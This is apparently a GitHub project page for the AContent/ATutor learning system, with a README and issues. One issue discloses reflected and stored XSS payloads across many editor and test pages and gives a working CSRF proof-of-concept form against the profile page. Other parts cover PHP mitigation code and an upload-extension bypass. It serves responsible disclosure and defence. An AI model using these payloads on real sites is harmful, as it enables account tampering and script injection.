
acontent's Introduction

ATutor Readme:

About

ATutor is a learning management system (LMS) used for the continuing professional development of teachers, for career development, and for academic research. It is written in PHP and runs on any operating system that supports a PHP web server.

Features

Two accessibility features in the system are text alternatives for all visual elements and keyboard access to all elements of the program. With these features, a blind person can listen to the entire interface of the system with the help of a screen reader, and he or she can use the system without needing a mouse. These features also allow ATutor to adapt to a wide variety of technologies, including cell phones, personal digital assistants (PDAs), and text-based Web browsers, to name a few. ATutor is also designed for adaptability to any of several teaching and learning scenarios. There are four main areas that reflect this design principle: themes, privileges, tool modules, and groups.

Installation

To install ATutor, point your web browser to the installation directory where ATutor was extracted, and follow the Installer's instructions. e.g. http://localhost/ATutor

For full installation instructions see: https://atutor.github.io/atutor/docs/installation

Installing from a Github Clone

  1. Fork ATutor into your own Github account, at: https://github.com/atutor/ATutor

  2. Clone ATutor from the fork you created into the document root of your webserver (for convenience), with: git clone https://github.com/yourname/ATutor.git

  3. Before running the Installer, create an empty config.inc.php file in the ATutor/include/ directory. If you have a command line to work from, while located in the ATutor directory, create the file with: touch include/config.inc.php

  4. Follow the installation instructions at the link above.

  5. Or, follow the instructions given by the ATutor Installer.

How to contribute

If you want to contribute to ATutor follow the instructions below or on https://atutor.github.io/atutor/docs/dev_with_github.html

  1. Fork the repository and create a clone
  2. Create a new branch to work in
  3. Edit and create new files within your new branch
  4. Make sure your branch is up to date with the master branch
  5. Merge pull requests into the master branch

For additional ATutor documentation, see the ATutor Handbook in ATutor, or at the following links:

Developers

  • Inclusive Design Research Centre
  • OCAD University
  • ATutorSpaces

License

GPL


Have fun, and take it places!

-Greg

acontent's People

Contributors

anvk, atutorlangs, catiaprandi, cindyli, gregrgay, harriswong, matteoceppini, mayankgupta, pasindud, sudwebdesign, supungs


acontent's Issues

XSS and CSRF issues on v1.4

Hello...
I have found XSS and CSRF issues in atutor/AContent v1.4.
I used AContent 1.4 Demo on your official website.
Please let me know if you need additional information.
I hope this is the right channel to disclose security issues, because you requested that any bugs be posted to this GitHub page.
Regards.

Findings

XSS (Reflected)

https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>

XSS (Stored)

1 (editor/edit_content_folder.php)

  1. In the Content Folder Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

2 (editor/edit_content.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

3 (editor/edit_content.php)

  1. In the Title Field with HTML format selected, please enter any clickable name. For example, <script>test</script>.
  2. In the Body, please enter <script>alert(document.domain)</script>
  3. Click Preview Button to trigger the JS alert
  4. Click Save Button
  5. Click <script>test</script> to trigger the JS alert again

4 (tests/edit_test.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert

5 (tests/edit_question_likert.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button
  4. Every time we are on the Question Bank (tests/question_db.php), the JS alert is also triggered

6 (tests/create_question_matchingdd.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

7 (tests/create_question_matching.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

8 (tests/create_question_multianswer.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

9 (tests/create_question_multichoice.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

10 (tests/create_question_long.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

11 (tests/edit_question_ordering.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

12 (tests/edit_question_truefalse.php)

  1. In the Statement Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button

13 (tests/question_cats_manage.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Delete Button

14 (course/course_property.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert

CSRF

  1. Log in at the official website.
  2. Save the HTML code below and give it a name, e.g. CSRF_Payload.html.
  3. Open and execute the payload in the same browser by clicking the CLICK ME button
<!DOCTYPE html>
<html>
<body>
	<!-- Cross-site form post to the AContent profile page; the browser attaches the victim's session cookie automatically -->
	<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
		<input name="password_error" type="hidden">
		<input type="hidden" name="form_password_hidden" value="">
		<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
		<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
		<!-- Checkbox copied from the original form; its onclick references jQuery, which this page does not load, but the handler never fires because the box is hidden and never clicked -->
		<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
		<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
		<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
		<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
		<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
		<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
		<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
		<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
		<!-- Click the button to execute this CSRF Payload -->
		<input type="submit" name="submit" value="CLICK ME" class="submit">
	</form>
</body>
</html>

Suggested Mitigations

  1. For the XSS issues, we can use input validation and an escape function for all user-supplied inputs. I see you made special characters become like &lt;script&gt;alert(document.domain)&lt;/script&gt; in certain places, but not in many other places, and therefore they are still vulnerable to XSS.
  2. For the CSRF issue, we can use a CSRF token. It would be better if Change Password and Change Email Address also used a CSRF token.
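The two controls listed under Suggested Mitigations, shown together as an added PHP example. This is not AContent's own code: the helper names, the session key csrf_token, the sample profile field and the form action are assumptions for illustration.

```php
<?php
// Added example, not AContent's code: output escaping at every render site
// plus a per-session CSRF token checked on every state-changing POST.
// Helper names, the session key and the form field names are assumed.

session_start();

/**
 * Escape a user-supplied value for an HTML text node or a double-quoted
 * attribute. Call it at every output site (edit form, preview, delete
 * confirmation, question bank listing), not only on the page where the
 * value was entered, since a value escaped in one view is still raw in the others.
 */
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Return the session's CSRF token, generating a 256-bit random one on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden input to include in every state-changing form (profile, password, e-mail address). */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="' . h(csrf_token()) . '">';
}

/**
 * Accept a POST only if it carries the session's token. A page on another
 * origin cannot read the victim's token, so a forged form cannot supply it.
 * hash_equals() keeps the comparison constant-time.
 */
function csrf_check(array $post): bool
{
    $submitted = $post['csrf_token'] ?? null;
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Profile form handler: reject forged requests before touching any data.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // Validate and persist first_name, last_name, organization and the other fields here.
}

// Constructed sample value standing in for a stored profile field.
$first_name = '<script>alert(document.domain)</script>';
?>
<form method="post" action="profile/index.php">
  <?= csrf_field() ?>
  <!-- h() turns the stored payload into &lt;script&gt;... so the browser renders text, not a script -->
  <label>First name: <input name="first_name" value="<?= h($first_name) ?>"></label>
  <button type="submit">Save</button>
</form>
```

htmlspecialchars() is correct only for HTML text and attribute contexts; a value placed inside a script block, a URL or a CSS rule needs that context's own encoding. Marking the session cookie SameSite=Lax or Strict adds defence in depth against the CSRF, but the token check is the control that does not depend on browser behaviour.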

get_result alternative needed

get_result() is only available when the mysqlnd module is installed. This was a problem when trying to set up on http://atutordemos.x10host.com.

$result = $stmt->get_result();

I did find a piece of code (function get_result()) that returns an array, but the output needs to be a $stmt->execute() object.

Here's where the piece of code came from:
https://stackoverflow.com/questions/10752815/mysqli-get-result-alternative

What can be done to mimic $mysqli->get_result?
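A portable substitute for $stmt->get_result(), as an added example that is neither AContent's code nor the Stack Overflow answer linked above. It relies on result_metadata() and bind_result(), which both the libmysqlclient and mysqlnd drivers provide, and returns the rows as an array of associative arrays rather than a mysqli_result, so a caller that loops with $result->fetch_assoc() loops over the array instead. The table and column names in the usage comment are assumed.

```php
<?php
// Added example, not AContent's code: emulate mysqli_stmt::get_result() on a
// PHP build without mysqlnd, using result_metadata() and bind_result().

/**
 * Fetch every row of an executed prepared statement as an array of
 * associative arrays. Throws on statements without a result set and on
 * driver errors instead of silently returning nothing.
 */
function stmt_fetch_all_assoc(mysqli_stmt $stmt): array
{
    $meta = $stmt->result_metadata();
    if ($meta === false) {
        throw new RuntimeException('No result set (not a SELECT, or execute() failed): ' . $stmt->error);
    }

    // One output variable per column, handed to bind_result() by reference.
    // Columns that share a name (a JOIN without aliases) collapse into one
    // slot, so alias them in the SQL.
    $row  = [];
    $refs = [];
    while ($field = $meta->fetch_field()) {
        $row[$field->name] = null;
        $refs[] = &$row[$field->name];
    }
    $meta->free();

    if (!call_user_func_array([$stmt, 'bind_result'], $refs)) {
        throw new RuntimeException('bind_result() failed: ' . $stmt->error);
    }

    $rows = [];
    while (($status = $stmt->fetch()) === true) {
        // Copy element by element: "$rows[] = $row" would keep the references,
        // and every stored row would later hold the last row's values.
        $copy = [];
        foreach ($row as $name => $value) {
            $copy[$name] = $value;
        }
        $rows[] = $copy;
    }
    if ($status === false) {
        throw new RuntimeException('fetch() failed: ' . $stmt->error);
    }
    return $rows;
}

// Usage with an assumed connection and table (illustration only):
//   $stmt = $mysqli->prepare('SELECT user_id, login FROM users WHERE status = ?');
//   $stmt->bind_param('i', $status);
//   $stmt->execute();
//   foreach (stmt_fetch_all_assoc($stmt) as $user) {
//       echo $user['login'], "\n";
//   }
//   $stmt->close();
```

Because fetch() returns null at the end of the result set and false on error, the loop condition compares against true explicitly; a plain while ($stmt->fetch()) would hide a driver error as an empty result.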

File Extension Upload Bypass

Running with the default configuration, this application does not list .php7 or .phtml as illegal extensions. This allows potentially malicious PHP files to be uploaded to and executed by this server. While I understand this application is no longer maintained, I recommend that anyone running the application include these two file extensions in the "illegal file extensions" area of the admin settings.
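An allowlist check placed beside the denylist approach the issue describes, as an added PHP example that is not AContent's code. The extension lists, the sample file names and the upload directory are assumptions for illustration; the point is that a denylist has to name every extension the server maps to PHP, while an allowlist only has to name what the application needs.

```php
<?php
// Added example, not AContent's code: denylist vs allowlist checks for an
// uploaded file name. Extension lists and directory are assumed.

/** Extensions an Apache/mod_php or PHP-FPM setup is commonly configured to execute as PHP. */
const EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phar', 'phps', 'pht', 'phtm',
];

/** Denylist, like the default configuration the issue describes: .php7 and .phtml are not listed. */
function denylist_allows(string $filename, array $illegal = ['php', 'php3', 'php4', 'php5', 'exe']): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $illegal, true);
}

/**
 * Allowlist: the final extension must be one the application needs, and no
 * earlier dot-separated segment may be PHP-executable, because an Apache
 * AddHandler mapping treats "shell.php.jpg" as PHP on the inner ".php".
 */
function allowlist_allows(string $filename, array $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip']): bool
{
    $name = strtolower(basename($filename));
    // No extension at all, or a dotfile such as ".htaccess": reject.
    if ($name === '' || $name[0] === '.' || strpos($name, '.') === false) {
        return false;
    }
    $segments = explode('.', $name);
    $ext = array_pop($segments);
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    foreach ($segments as $segment) {
        if (in_array($segment, EXECUTABLE_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

/**
 * Destination for an accepted upload: a random server-chosen name with the
 * validated extension, so the client controls neither name nor directory.
 * Returns null when the original name fails the allowlist.
 */
function safe_upload_path(string $original, string $dir): ?string
{
    if (!allowlist_allows($original)) {
        return null;
    }
    $ext = strtolower(pathinfo($original, PATHINFO_EXTENSION));
    return rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names. The denylist accepts all four; the allowlist accepts only notes.pdf.
foreach (['shell.php7', 'shell.phtml', 'shell.php.jpg', 'notes.pdf'] as $f) {
    printf("%-14s denylist=%-6s allowlist=%s\n", $f,
        denylist_allows($f) ? 'allow' : 'reject',
        allowlist_allows($f) ? 'allow' : 'reject');
}
```

Name checks alone do not stop execution if the upload directory sits under the web root and the server runs scripts there: store uploads outside the document root, or disable script execution for that directory in the server configuration, and do not rely on a denylist that an uploaded .htaccess could extend with new handlers.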
